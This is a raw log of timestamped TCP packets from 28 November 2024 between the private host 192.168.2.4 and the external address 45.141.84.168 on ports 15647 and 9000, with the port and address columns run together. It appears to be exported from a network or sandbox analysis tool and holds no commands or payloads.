                                          Nov 28, 2024 13:39:07.501207113 CET497319000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:07.507860899 CET497319000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:07.583359003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:07.583776951 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:07.613090992 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:07.627017975 CET497329000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:07.627782106 CET90004973145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:07.703809977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:07.707765102 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:07.747039080 CET90004973245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:07.747119904 CET497329000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:07.747252941 CET497329000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:07.814457893 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:07.814523935 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:07.827747107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:07.867185116 CET90004973245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:07.934660912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:07.935878038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:08.029062033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.033782959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:08.056154966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.136161089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.136308908 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:08.154009104 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.256520033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.256705999 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:08.257350922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.312853098 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:08.355542898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.355663061 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:08.422993898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.458085060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.458159924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:08.476902962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.556643009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.578130007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.581724882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:08.678267002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.679682016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:08.704583883 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.779395103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.803040981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.805753946 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:08.906372070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:08.909754992 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:08.926728964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.004425049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.005136013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.030867100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.125390053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.125447989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.127993107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.149799109 CET90004973245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.149988890 CET497329000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.172311068 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.232271910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.232371092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.266608000 CET497339000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.270421982 CET90004973245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.270534039 CET497329000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.286735058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.326749086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.352771044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.352999926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.386665106 CET90004973345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.386887074 CET497339000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.387105942 CET497339000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.433442116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.473064899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.473191977 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.506957054 CET90004973345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.554517031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.554599047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.593091965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.674329042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.674428940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.674453974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.794442892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.794487953 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.794579983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.875849962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.875945091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.916445971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.995807886 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:09.995975018 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:09.998183966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.116164923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.116245985 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:10.117670059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.172202110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:10.278758049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.278836012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:10.318008900 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.318133116 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:10.359914064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.401694059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.406589985 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:10.438239098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.438405991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:10.519191027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.558428049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.558564901 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:10.560946941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.609723091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:10.720256090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.720354080 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:10.789706945 CET90004973345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.789860010 CET90004973345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.789910078 CET497339000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:10.789932966 CET497339000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:10.880786896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:10.880892038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:10.891443968 CET497349000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:10.909832954 CET90004973345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:11.012478113 CET90004973445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:11.012752056 CET497349000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:11.012892962 CET497349000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:11.042371035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:11.042634010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:11.081985950 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:11.082089901 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:11.133059025 CET90004973445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:11.202352047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:11.202428102 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:11.203375101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:11.250335932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:11.364034891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:11.364151955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:11.523807049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:11.523926973 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:11.685704947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:11.685806990 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:11.724884033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:11.765957117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:11.845451117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:11.845557928 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:12.007266998 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:12.007365942 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:12.167987108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:12.168075085 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:12.328792095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:12.328881979 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:12.415647984 CET90004973445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:12.415822029 CET90004973445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:12.415846109 CET497349000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:12.415875912 CET497349000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:12.489464045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:12.489573956 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:12.532103062 CET497359000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:12.536556005 CET90004973445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:12.650224924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:12.650350094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:12.652081013 CET90004973545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:12.652168036 CET497359000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:12.652268887 CET497359000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:12.774544001 CET90004973545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:12.811474085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:12.811599970 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:12.971746922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:12.971892118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:13.144422054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:13.144654989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:13.293206930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:13.293292999 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:13.345468044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:13.390983105 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:13.486732006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:13.486821890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:13.494360924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:13.494440079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:13.608762980 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:13.608809948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:13.615832090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:13.695539951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:13.728813887 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:13.737356901 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:13.809742928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:13.857940912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:13.858119011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:13.930144072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:13.980457067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:13.980546951 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.008791924 CET90004973545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.009046078 CET90004973545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.009083033 CET497359000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.009116888 CET497359000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.051961899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.094237089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.101114035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.101178885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.110200882 CET497369000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.131179094 CET90004973545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.181987047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.182082891 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.221266985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.230165958 CET90004973645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.230253935 CET497369000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.230396032 CET497369000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.302186012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.302262068 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.302470922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.344121933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.351279020 CET90004973645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.422796965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.422873974 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.466399908 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.503453970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.503669977 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.586730003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.623835087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.624072075 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.744245052 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.744528055 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.911077976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.911153078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:14.945449114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:14.945547104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.031141043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.065653086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.065741062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.068855047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.109832048 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.188137054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.188349009 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.232547045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.281706095 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.362867117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.363102913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.387669086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.387728930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.483304977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.507757902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.507817984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.510560036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.541883945 CET90004973645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.542020082 CET90004973645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.542087078 CET497369000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.542293072 CET497369000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.562827110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.588876009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.656579971 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.657016993 CET497379000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.664400101 CET90004973645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.674766064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.674810886 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.709103107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.709170103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.778110027 CET90004973745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.778213978 CET497379000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.794759989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.816481113 CET497379000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.829374075 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.830526114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.875384092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:15.938568115 CET90004973745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:15.996084929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.014384031 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:16.194776058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.194843054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:16.197161913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.250475883 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:16.314904928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.315041065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:16.336932898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.391091108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:16.478777885 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.479010105 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:16.516318083 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.562983036 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:16.599282026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.599340916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:16.637934923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.687850952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:16.766733885 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.766782999 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:16.800559044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.800641060 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:16.886955023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.920651913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.920736074 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:16.922550917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:16.969224930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.088228941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.088558912 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.140165091 CET90004973745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.140258074 CET90004973745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.140440941 CET497379000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.140580893 CET497379000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.242031097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.242252111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.251266003 CET497389000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.260564089 CET90004973745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.371294022 CET90004973845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.371438026 CET497389000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.371562004 CET497389000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.409878016 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.409948111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.443332911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.484719992 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.491478920 CET90004973845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.582781076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.582838058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.610991955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.656616926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.702860117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.702945948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.812215090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.812333107 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.823122025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.904208899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:17.904283047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:17.933105946 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.024229050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.024333000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.190761089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.190834045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.225517988 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.225611925 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.313977003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.345752954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.345850945 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.348675966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.390980959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.487905979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.488003969 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.662889004 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.667120934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.680244923 CET90004973845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.680561066 CET90004973845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.680644035 CET497389000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.681310892 CET497389000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.708699942 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.801232100 CET90004973845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.809833050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.828639984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.833899021 CET497399000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.835269928 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.868374109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.922216892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.954116106 CET90004973945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.954188108 CET497399000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.954350948 CET497399000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:18.955240965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:18.955282927 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:19.011080027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.062839031 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:19.074934006 CET90004973945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.075679064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.075726032 CET4973015647192.168.2.445.141.84.168
